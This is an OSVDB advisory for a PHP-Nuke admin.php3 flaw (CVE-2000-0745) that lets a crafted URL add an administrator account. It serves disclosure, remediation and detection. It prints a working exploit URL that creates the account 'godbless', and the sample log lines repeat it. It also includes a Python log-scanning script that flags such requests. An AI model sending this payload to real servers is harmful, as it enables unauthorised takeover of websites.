PHP-Nuke admin.php3 Gain Administrative Privilege

2000-08-20T00:00:00
ID OSVDB:1521
Type osvdb
Reporter OSVDB
Modified 2000-08-20T00:00:00

Description

Vulnerability Description

PHP-Nuke contains a flaw that may allow a malicious user to gain administrative privileges. The issue is triggered when a specially crafted URL is sent to the server, which exploits a flaw in admin.php3. It is possible that the flaw may allow an attacker to take control of the system resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

The following URL will add the account "godbless:indonesia" into the authors database:

http://www.example.com/admin.php3?admin=YmxhYmxhOg%3D%3D&op=AddAuthor&add_aid=godbless&add_name=Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me
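
For reviewing web server logs of an installation that ran a version below 3.0, the following added example (not part of the OSVDB entry or of PHP-Nuke) flags requests to admin.php3 that carry both an admin value and op=AddAuthor in the query string, as the URL above does. It assumes Common Log Format; the sample lines, the function names, and the choice to treat an admin value in the URL as suspicious are assumptions of this example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Common Log Format lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Aug/2000:10:01:02 +0000] "GET /admin.php3?admin=YmxhYmxhOg%3D%3D&op=AddAuthor&add_aid=godbless&add_name=Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me HTTP/1.0" 200 512
192.0.2.11 - - [21/Aug/2000:10:02:00 +0000] "GET /index.php3 HTTP/1.0" 200 2048
192.0.2.12 - - [21/Aug/2000:10:03:00 +0000] "GET /admin.php3?op=AddAuthor&admin=zz%21&add_aid=tester HTTP/1.0" 200 400
192.0.2.13 - - [21/Aug/2000:10:04:00 +0000] "GET /admin.php3 HTTP/1.0" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*"')

def decode_token(value):
    """Best-effort base64 decode of the admin value for triage; None if it is not base64."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def find_add_author_requests(log_text):
    """Return one record per admin.php3 request with admin and op=AddAuthor in the URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, when, _method, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/admin.php3"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if "admin" not in params or params.get("op", [""])[0] != "AddAuthor":
            continue
        hits.append({
            "client": client,
            "time": when,
            "new_account": params.get("add_aid", [""])[0],
            "admin_decoded": decode_token(params["admin"][0]),
        })
    return hits

if __name__ == "__main__":
    for hit in find_add_author_requests(SAMPLE_LOG):
        print(hit)
```

Each hit names the account in add_aid, which can then be compared against the authors database to find entries that were not created by a legitimate administrator.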

References:

Vendor URL: http://www.phpnuke.org
Other Advisory URL: http://www.securityfocus.com/archive/1/78500
Other Advisory URL: http://www.securityfocus.com/archive/1/77378
Other Advisory URL: http://www.securiteam.com/securitynews/5AP0L002AG.html
ISS X-Force ID: 5108
CVE-2000-0745
Bugtraq ID: 1592